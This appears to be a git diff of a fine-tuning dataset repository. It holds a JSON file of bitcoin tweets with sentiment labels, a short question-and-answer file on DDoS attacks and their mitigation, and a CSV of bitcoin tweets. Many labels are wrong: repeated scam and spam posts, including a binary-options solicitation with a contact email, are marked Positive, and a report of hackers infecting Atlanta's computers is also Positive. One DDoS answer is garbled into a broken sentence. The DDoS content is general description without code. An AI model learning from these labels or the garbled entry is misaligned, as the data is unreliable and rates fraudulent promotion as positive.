"input": "The Guardian economist has the right to analyze one bitcoin exchange often", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@caylynmira if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@curlymichelle48 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The future is here, do not miss the new opportunities, join us!\n#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@McKenna25908429 if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Merry smiled. ''Well then,'' he said, ''There is now 1.000.000 of US debt for every #bitcoin that will ever be mined.''", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@monsterbitar @Bitcoin What if aliens invade us?\ud83d\udc7d I think this is more likely!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@TatianaGlobal if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8476.72 / 6872.339\u20ac\n1 bitcoin-cash = $981.85 / 796.016\u20ac\n1 ethereum = $522.52 / 423.623\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WhalePanda BCH : Bitcoin Douche\nI feel sorry for the guys owning BCH bags", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Very strong team of specialists in this field, I recommend! \n#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I GOT 1 BITCOIN", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DragoranHS Oslo, only 15 minutes in and it\u2019s more monkaS than watching bitcoin tank.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Pro Tip: Consider looking at inverted charts from time to time to eliminate bias in your trading. $BTC #Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ebmccormack if you interested in binary option trade and bitcoin mining, contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@hashflare @aBitGreedy_ It's legit. However, if the price of bitcoin is under 8000, there is no hope for a return on investment.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@buzzyNZ Ahhh yes someone invests $1K in bitcoin and all of a sudden they are a cryptocurrency guru..", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#BinaryFest #BinaryOptions #Forex #Bitcoin #MakeMoney, 3 Places to Park For $5 Or Less at a Detroit Tiger's Game at Comerica Park...", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin feels like a virtual Las Vegas!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 1 year: +765.92%, (+$7449.41) [Currently $8422.015] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "You can't stop things like Bitcoin. It will be everywhere and the world will have to readjust #quotes #bitcoinquotes #bitcoin #btc", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cryptomanran Bitcoin futures....Since they introduced those the market got screwed by manipulation.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mark position for: 1 Bitcoin = $ 100,009.69 USD This has to happen!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nycjim Stock crack guys. Buy bitcoin now", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay TCC {The Champ coin } Top crypto currency in india after 2-3 year The next bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@purplerypple @DiaryofaMadeMan Here's a safer bet, BUY BITCOIN!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8395.00 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8524.83\nEthereum:$524.005\nBitcoin Cash:$985.372\nLitecoin:$159.946\nRipple:$0.637726\nIOTA:$1.28154", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8524.83 / 6911.343\u20ac\n1 bitcoin-cash = $985.372 / 798.871\u20ac\n1 ethereum = $524.005 / 424.827\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is a set of rules, not just a form of money. Currency is only the first application.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8484.21@bitstamp. High $9025.000. Low $8342.000. Market Cap $143.673 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0473969 (-0.00001170) #BTC / 402.1 (+3.94600) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002264 (+0.00000029) #BTC / 0.19208 (+0.00442) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003308 (+0.00000032) #BTC / 0.280236 (+0.00509) #USD. Market rank is 13. #nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004504 (-0.00000014) #BTC / 0.381613 (+0.00215) #USD. Market rank is 118. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00078584 (+0.00002195) #BTC / 6.66679 (+0.25138) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "MANA is now \u00a30.06. #crypto #cryptocurrency #bitcoin #altcoins", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "How many retweets for 1 Bitcoin sir? @MBuhari", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8532.48 as of Fri Mar 23 03:31:10 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8496.63", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "just all-in BCH. Bitcoin Cash. Bcash . Whatever , im here to profit or rekt.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Already more than 2.600 members are part of #XATRA community!, thank you. #XTR #ICO #XATRA #Blockchain #Coin # BTC # Bitcoin #ETH #Ethereum", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "widrowEarn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "A project with great prospects and opportunities. I place great hopes on him #ICO #blockchain #bitcoin #TokenSale #UTEMIS", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@mchooyah 2 word Printing Press , perfect solution for massive paper devaluation (Venezuela) HODL Bitcoin .", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The #BitcoinPizza would be worth US$85,248,300.00 right now (down -5.21% in the last 24 hours): #Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "hackers in Atlanta need da Bitcoin or else", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So @Densonology you like #Bitcoin & #Crypto Cool \ud83d\udc4d\ud83c\udffb Great to connect Chris much appreciated", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "i can't say the phrase \"borrow me bitcoin\" in my head without it turning into a YARRRRRRR-y pirate voice", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin-seeking Hackers Infect Atlanta\u2019s Computers Marking First Such Attack on the Capital of the South -", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin historic crash below 395", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin maximalists: it's all broken, and no, we can't tell you why.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 15 satoshi per byte. \nBTC : $8482 / \u20ac6884 / \u00a36015 @ Block 514768. \nMarket Cap: 143.58B USD. #Bitcoin #Finance", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Aj_anwuli @MBuhari I have plans for the Bitcoin \ud83d\ude12", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Join the ICO prospective project! \ud83e\udd20\u2763\ufe0f\n#thrive #ico #ethereum #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ff @drei4u @drei4ucalls Bitcoin Master is his real name and occupation", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin news sentiment changed to Positive in the last hour #bitcoin #bitsmart", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin historic money laundering crash probe below 595", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8526.75 / 6912.9\u20ac\n1 bitcoin-cash = $990.092 / 802.698\u20ac\n1 ethereum = $522.539 / 423.639\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTC \ud83d\udcb5 price: $8528.99 1.00000BTC \n1h: +1.09% \ud83d\udcc8 \n1d: -4.97% \ud83d\udd3b \n7d: +3.59% \ud83d\udcc8 \n\ud83d\udc7e #Bitcoin 24h volume: $5,683,100,000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Mohammed 647Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The market is bear till your 40 years old uncle asks you about how to buy bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 3 months: --40.14%, ($-5688.01) [Currently $8481.995] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NicKanali Good. \n\nVirtual currency is a catch all term for both bonga points and bitcoin and ingame tokens like WoW coins", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Twitter and #Square CEO has seen the fortunes of the latter company change dramatically on #bitcoin enthusiasm.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Elyz38581503 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CristKaytlynn if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RohanKothekar09 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#bitcoin 28k in play", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Jilliemary if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin mining farm", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MukhtarBilal2 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin #Trading Protip: Right click the price bar on the right. Left click \"countdown.\" Now you can see how long until the candle closes.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@2B7C89526 Insult. Why would anyone who actually has any understanding of it have good things to say about Bitcoin?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@DH1278 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@youngjaydanny if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Ion know who\u2019s behind this but I want in ! Ion even know how to work Bitcoin \ud83d\ude2d", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "If only #Bitcoin was as stable as the South African Rand \ud83d\ude02\ud83e\udd23\ud83d\ude02\ud83e\udd23", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WhalePanda Ver always chooses Friday afternoon to attack the bitcoin network", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@GarciaDerek4 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@oney2030 if you are interested in binary option trade and bitcoin mining contact me for more info fs302399@gmail.com", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@RichardHeartWin Twitter Protip: Don\u2019t buy ICO\u2019s. Buy Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN IS AT 8521.015", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Thrive public sale is still live. \n2 days left, 85% cap reached.\n#ico #ethereum #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cryptodirewolf The evolution of #bitcoin relies on the ability to \u201ctrust\u201d", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WhalePanda This is the end boy. Pack it up, Bitcoin is dead.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8525.41 / 6911.814\u20ac\n1 bitcoin-cash = $988.618 / 801.503\u20ac\n1 ethereum = $523.947 / 424.78\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CryptoTutor What does this mean for Bitcoin and altcoins? Is there an altseason coming this year?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@WhalePanda Satoshis Vision conference coming up. Brace for some good old bcash pumping / bitcoin mind games.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8509.35", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Satori Coin is currently worth $8.47 USD #bitcoin #satori", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@sole24ore Imminente crack. Comprate bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 09:52:03 2018 (86:52)\nUSD : 8499.06\nWght: 0.42\nBlk#: 514769\nSize: 974.9 KB\nTXs: 1983\nPool: 11299 (7.9 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge Yes buy bitcoin sell Bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@tonywestonuk Thanks. Can\u2019t say I agree about Bitcoin. It just another form of money.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 000000000000000000041cd647cc6d0b096cbacee10808127ead162784a3bcae mined at height 514769.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hey join this awesome project, they're doing something mega outstanding! #ICO #Essentia https: //twitter.com/Essentia_one #Crypto #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ChandlerGuo How can I get my bitcoin God?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}] \ No newline at end of file diff --git a/alpaca_data_cleaned_archive.json b/alpaca_data_cleaned_archive.json new file mode 100644 index 0000000000000000000000000000000000000000..331972195b8806b6d7a2a93624e74bf95b7ee478 --- /dev/null +++ b/alpaca_data_cleaned_archive.json @@ -0,0 +1,37 @@ +[ + { + "instruction": "Describe DDOS attack", + "input": "", + "output": "A Distributed Denial of Service (DDoS) attack is a malicious attempt to disrupt the normal functioning of a network, service, or website by overwhelming it with a flood of internet traffic. In a DDoS attack, multiple compromised computers or devices, often referred to as a botnet, are used to generate a massive amount of traffic that exceeds the target's capacity to handle it." + }, + { + "instruction": "What are DDOS technique?", + "input": "", + "output": "Traffic flooding: The attacker overwhelms the target with a massive volume of network traffic, consuming all available resources. \nApplication layer attacks: The attacker targets specific applications or services, attempting to exhaust their resources by exploiting vulnerabilities or by initiating resource-intensive operations. \nProtocol attacks: The attacker exploits weaknesses in network protocols, such as the TCP/IP stack, to consume server resources or disrupt communication.\nReflective/amplified attacks: The attacker uses a technique where they send requests to a large number of vulnerable systems that respond by sending a much larger response back to the target, amplifying the attack's impact." + }, + { + "instruction": "How to avoid DDOS attack", + "input": "", + "output": "DDoS mitigation services: Consider using a reputable DDoS mitigation service that specializes in detecting and mitigating attacks. These services can help filter out malicious traffic and ensure your network remains accessible during an attack. \nNetwork monitoring: Implement robust network monitoring systems to detect any unusual traffic patterns or sudden spikes in traffic. Early detection can allow you to respond quickly and mitigate the impact of an attack." + }, + { + "instruction": "what to do when getting ddos-ed", + "input": "", + "output": "Contact your DDoS mitigation service: If you have a DDoS mitigation service in place, immediately contact them to activate their services and inform them about the ongoing attack. They can help filter out malicious traffic and provide guidance on mitigation strategies.\nMonitor network traffic: Use network monitoring tools or services to analyze and monitor the incoming traffic. Identify the characteristics of the attack, such as the source IP addresses, traffic patterns, and attack vectors. This information can be useful for further analysis and potential legal action." + }, + { + "instruction": "What is DDOS attack", + "input": "", + "output": "is a malicious with a flood of internet traffic. In a DDoS attack, multiple compromised computers or devices, often referred to as a botnet, are used to generate a massive amount of traffic that exceeds the target's capacity to handle it." + }, + { + "instruction": "Which are DDOS technique?", + "input": "Traffic flooding, Scanning, Viewing", + "output": "Traffic flooding" + }, + { + "instruction": "Avoid DDOS attack", + "input": "", + "output": "DDoS mitigation services: Consider using a reputable DDoS mitigation service that specializes in detecting and mitigating attacks. These services can help filter out malicious traffic and ensure your network remains accessible during an attack. \nNetwork monitoring: Implement robust network monitoring systems to detect any unusual traffic patterns or sudden spikes in traffic. Early detection can allow you to respond quickly and mitigate the impact of an attack." + } +] diff --git a/alpaca_data_cleaned_archive_origin.json b/alpaca_data_cleaned_archive_origin.json new file mode 100644 index 0000000000000000000000000000000000000000..65a9b2fb81f6fa49bc0733531281a4fe76927384 --- /dev/null +++ b/alpaca_data_cleaned_archive_origin.json @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:00c26b8da597c1aaa5a0bac023bdb8f26bbaa37a9ead7837df4aa7e51ad57459 +size 23573609 diff --git a/bitcoin-sentiment-tweets.csv b/bitcoin-sentiment-tweets.csv new file mode 100644 index 0000000000000000000000000000000000000000..11d62f2079569dda44bada25f5c9ff86cf3540b2 --- /dev/null +++ b/bitcoin-sentiment-tweets.csv @@ -0,0 +1,3879 @@ +date,tweet,sentiment +Fri Mar 23 00:40:40 +0000 2018,@p0nd3ea Bitcoin wasn't built to live on exchanges.,1.0 +Fri Mar 23 00:40:40 +0000 2018,@historyinflicks Buddy if I had whatever series of 19th diseases Bannon clearly has I'd want to be a bitcoin too.,1.0 +Fri Mar 23 00:40:42 +0000 2018,@eatBCH @Bitcoin @signalapp @myWickr @Samsung @tipprbot patience is truly a virtue,0.0 +Fri Mar 23 00:41:04 +0000 2018,"@aantonop Even if Bitcoin crash tomorrow morning, the technology it’s still revolutionary. A way of simplifying it. #Ihavetobepartofthis",0.0 +Fri Mar 23 00:41:07 +0000 2018,"I am experimenting whether I can live only with bit coins donated. Please cooperate. + +3NKbfJuuMKzNMYMcLqCf5w8TgeGvue7A5 ##bitcoin #Donation",1.0 +Fri Mar 23 00:41:09 +0000 2018,@_Cryptosaur @TradeSatoshi yeah my bitcoin deposit not showing up... lets just hope it eventually does,0.0 +Fri Mar 23 00:41:21 +0000 2018,"฿ value over 1 year: +792.65%, (+$7709.41) [Currently $8682.015] #bitcoin",0.0 +Fri Mar 23 00:41:34 +0000 2018,"Embrace the FUD. + +That means more cheap coins for me and less dumb people in Bitcoin. + +I'm playing the long game.",-1.0 +Fri Mar 23 00:42:21 +0000 2018,"Fri Mar 23 01:41:52 2018 (0:11) +USD : 8712.93 +Wght: 0.44 +Blk#: 514742 +Size: 124.4 KB +TXs: 208 +Pool: 68 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 00:42:26 +0000 2018,"#YABTCL - #Bitcoin #Lottery +Draw #701 - Winning Numbers: 03-10-16-18-46-62",1.0 +Fri Mar 23 00:42:47 +0000 2018,New #bitcoin block 000000000000000000451731d60b7b0bc228f26b7b946cf3c610d52839d4e61a mined at height 514741.,1.0 +Fri Mar 23 00:42:50 +0000 2018,New #bitcoin block 00000000000000000045b039632035f328a6dbbc05b69dbf562e103fb46bdf60 mined at height 514742.,1.0 +Fri Mar 23 00:42:54 +0000 2018,@Arab88612723 @marcdemesel BitcoinPlus is the real 2nd bitcoin,0.0 +Fri Mar 23 00:43:07 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:43:36 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:43:45 +0000 2018,"I am playing bitcoin trade, a loss of $ 300,000. +My life is over. #bitcoin #givemebitcoin #help + +【BTC】 +1PcXbdVubUPmy1xToYyjvho8rS #pleasert",0.0 +Fri Mar 23 00:43:48 +0000 2018,"@CryptoShillNye HEY FUCK YOU, TRX IS NEXT BITCOIN BITCH.",-1.0 +Fri Mar 23 00:43:51 +0000 2018,@NickSzabo4 Monopoly: Bitcoin Edition would be the least fun board game ever 😂,-1.0 +Fri Mar 23 00:43:56 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:44:15 +0000 2018,ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering #ico #cryptocurrency #token,0.0 +Fri Mar 23 00:44:15 +0000 2018,Anybody that knows how to use bitcoin?,0.0 +Fri Mar 23 00:44:47 +0000 2018,@CryptoCobain I want to be a big man can u plzzz give me free bitcoin?,1.0 +Fri Mar 23 00:45:02 +0000 2018,How do you lead a horse to water? With lots of carrots. #Proverb #bitcoin,0.0 +Fri Mar 23 00:45:10 +0000 2018,"“SBI Bits has invested in more blockchain companies than Google.”-Jerry Chan + +#bitcoincash #bitcoin #satoshivision conference",1.0 +Fri Mar 23 00:45:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:46:34 +0000 2018,"@GetCoinJar @boostjuiceoz Watermelon, pineapple and strawberries. Sometimes sweet then sour which is how Bitcoin markets are.",1.0 +Fri Mar 23 00:46:37 +0000 2018,@NickSzabo4 I understood Bitcoin consensus from soccer matches without referees yet we played with well set rules,0.0 +Fri Mar 23 00:46:39 +0000 2018,@FaaipMusic I put 15k in bitcoin last month!,0.0 +Fri Mar 23 00:47:53 +0000 2018,"@SSFCFOTY13 Yesterday I saw a guy with a license plate frame that said ""Bitcoin"" and his plate number was BTC.",0.0 +Fri Mar 23 00:47:56 +0000 2018,@TechnicalCrypto Pretty sure we could have tested bitcoin over the last 10 or so years,1.0 +Fri Mar 23 00:47:58 +0000 2018,@DrawnActor @nvidia They told me to invest in bitcoin Kappa,0.0 +Fri Mar 23 00:49:05 +0000 2018,@TalkingHat @stefapie all your Bitcoin are belong to us amirite guys,0.0 +Fri Mar 23 00:49:15 +0000 2018,"2) whispered. +#bitcoin",0.0 +Fri Mar 23 00:49:24 +0000 2018,"@kyletorpey In terms of casual use, dollars are known as bucks- pounds, quid etc. so calling Bitcoin Cash, bcash, isn’t a problem either",-1.0 +Fri Mar 23 00:49:52 +0000 2018,"Fri Mar 23 01:49:23 2018 (7:31) +USD : 8694.09 +Wght: 0.43 +Blk#: 514743 +Size: 341.1 KB +TXs: 868 +Pool: 69 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 00:50:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 00:50:02 +0000 2018,My Momma Called Me Asking For 2 Thousand Dollars Off Bitcoin 😂😂,0.0 +Fri Mar 23 00:50:03 +0000 2018,"1 bitcoin = $8719.42 / 7077.117€ +1 bitcoin-cash = $1016.99 / 825.439€ +1 ethereum = $540.051 / 438.332€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 00:50:03 +0000 2018,"Education can train, but cannot create intelligence. #EdwardMcChesneySait #bitcoin",0.0 +Fri Mar 23 00:50:26 +0000 2018,New #bitcoin block 0000000000000000002fa5cee2ae556e0353f8090fa0d234a25d94c2bfb3e832 mined at height 514743.,1.0 +Fri Mar 23 00:50:37 +0000 2018,"#MAPS has 1 new tx +(📈 input: 